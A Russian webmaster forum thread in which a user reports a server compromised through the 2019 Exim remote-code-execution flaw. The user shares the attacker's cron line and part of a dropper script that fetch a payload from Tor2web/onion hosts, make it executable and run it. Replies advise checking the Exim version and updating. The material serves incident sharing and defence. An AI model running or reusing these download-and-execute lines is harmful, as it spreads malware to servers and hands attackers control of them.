Уязвимость очень высокого уровня в exim
Страницы: 1
Уязвимость очень высокого уровня в exim, Проверяем свои сервера и устанавливаем обновление срочно!
10 июня примерно в 2.52 по мск один мой сервер был взломан данным способом скрин 1 [url]https://prnt.sc/nzqmhf[/url] скрин 2 [url]https://prnt.sc/nzq1ta[/url]
Заметил, что сайт упал 502 ошибкой начал смотреть заметил потухшие службы (скрин 2) в процессах висело такое

Код
[CODE]  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
10543 root      20   0  430524   7636    652 S 399.3  0.0 256:26.18 [kthrotlds]
   42 root      rt   0       0      0      0 S   0.3  0.0   0:00.01 watchdog/7
29601 mysql     20   0 2281312 274392   5496 S   0.3  0.4   0:00.28 mysqld
в кроне такой код был

Код
tbin=$(command -v passwd); bpath=$(dirname "${tbin}"; curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt) && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

В данный момент собираю новый сервер на старом пока сайт висит с обрубленным кроном, что именно успели сделать пока выясняю и не лечил

Код
wget http://lechillka.firstvds.ru/exim_rce_fixer.sh && chmod +x exim_rce_fixer.sh && ./exim_rce_fixer.sh
 и не уверен что всё вылечит решил новый сервер собрать.

В созданных файлах можно найти такой код 

Код
#!/bin/bash

SPOOLDIR=/var/spool/exim

cd $SPOOLDIR/db
for a in retry misc wait-* callout ratelimit; do
    [ -r "$a" ] || continue
    [ "${a%%.lockfile}" = "$a" ] || continue
    /usr/sbin/exim_tidydb $SPOOLDIR $a >/dev/null
done
или такой

Код
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
CTIMEOUT="22"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v passwd); bpath=$(dirname "${tbin}"
curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"; curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
LBIN8="kthrotlds"
null=' >/dev/null 2>&1'
sudoer=1
sudo=''
if [ "$(whoami)" != "root" ]; then
    sudo="sudo "
    timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; }
.................Не помещается ))...............

Может кому пригодится.
Подробно описано здесь https://firstvds.ru/blog/uyazvimost-v-pochtovom-servere-exim
Рекомендую хостинг beget.com
Рекомендую хостинг в Европе от 70р.
Промокод 1EED-7963-D606-E8F4 -5% при заказе домена или хостинга на reg.ru

Бесплатная контекстная реклама

Тоже вчера от хостера письмо получил по этому поводу. Как вы думаете отключение этой службы решит проблему или обязательно обновляться?
Цитата
андрей ирмишин пишет:
Тоже вчера от хостера письмо получил по этому поводу. Как вы думаете отключение этой службы решит проблему или обязательно обновляться?
Я думаю лучше обновиться, или вообще удалить с сервера если не пользуетесь.
Сначала проверьте свою версию Exim:

Debian/Ubuntu:
dpkg --list |grep exim 
CentOS:
rpm -qa |grep exim
У многих до сих пор версия 4,86, которую обновлять не обязательно пока. Да и значит вас проблема не коснулась. Проблема у: 4.87 до 4.91.
Изменено: Александр - 13 Июня 2019 15:11
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:42 Можно с помощью накрутки ПФ "почувствовать выход в опу мира и ощутить ответ тех поддержки яшы"? 
18:50 АП выдача 05.08.2020 | После открытия границ, кто-то куда-то? 
18:48 Накрутка поведенческих факторов весна - лето 2020 для продвижения сайта в ТОП Яндекса и Google 
18:11 Помогите с продвижением 
11:10 Lottery Partner в поиске партнеров! Самые высокие ставки! 
20:26 Падение трафика с Гугла более чем в 2 раза! А дальше - больше 
18:26 ClickDealer- свои люди на рынке буржа! 
22:08 Скупаю каналы Дзен 
21:58 Продаю Гадальные скрипты (47шт) для wordpress и dle 
21:32 Profit-smm.ru - раскрутка в Vk/Inst/Yt/Tg. Подписчики от 11.5р, лайки от 2.4р 
19:48 Качественный прогон Хрумером, Zennoposterом всего 10 WMZ, Большой опыт работы. Статьи, комментарии, профиля, гостевые. 
19:46 продам Зеброид 
17:35 SocksHub.net - proxy, которые подходят всем 
17:18 Привлеку подписчиков на Ваш канал в Яндекс Дзен, а также дочитку на статьи канала. 
18:52 ruposters.ru: На турецких курортах резко началась новая волна коронавируса 
18:07 Партнёрская рекламная сеть Vadideo Network 
16:47 [b]Webvork [/b]- международная товарная СРА сеть с сертифицированными офферами на Европу. 
11:59 Edu-affiliates - лучшая партнерка в нише эссе! 
07:46 Обсчитали в магазине 
22:08 Ваш сайт блокируют гос органы? Есть решение! 
20:41 Болезни нет, а вакцина есть